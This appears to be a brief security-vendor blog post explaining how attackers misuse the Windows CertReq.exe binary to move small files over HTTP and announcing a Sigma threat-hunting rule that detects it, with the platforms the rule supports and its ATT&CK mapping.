Living off the Land binaries (Lolbins) are legitimate binaries that advanced adversaries often misuse to perform actions beyond their original purpose. Cybercriminals actively use them to download malware, to ensure persistence, for data exfiltration, for lateral movement, and more. Just yesterday we wrote about a rule that detects attacks of the Evil Corp group, which also uses Lolbins to deploy WastedLocker ransomware on the maximum number of systems in organizations.
CertReq.exe is present on Windows and its intended use is to assist with the creation and installation of certificates. It is not one of the Lolbins which is overly exploited by cybercriminals, but it can be used to perform malicious actions without attracting the attention of security solutions. Cybercriminals can use CertReq.exe to upload and download small files. It can be used to upload a file via HTTP POST, download a file via HTTP POST and save it to disk or show contents. You can read more about CertReq.exe exploitation here.
Den Iuzvik developed and released a new threat hunting Sigma rule that detects possible file upload/download with CertReq.exe: https://tdm.socprime.com/tdm/info/BBbpPolVZpLp/SJcgLnMBQAH5UgbBoihF/?p=1
The rule has translations for the following platforms:
SIEM: Azure Sentinel, ArcSight, QRadar, Splunk, ELK Stack, RSA NetWitness, Sumo Logic, Graylog, Humio, LogPoint
EDR: Microsoft Defender ATP, Carbon Black, Elastic Endpoint
Tactics: Command And Control
Techniques: Remote File Copy (T1105)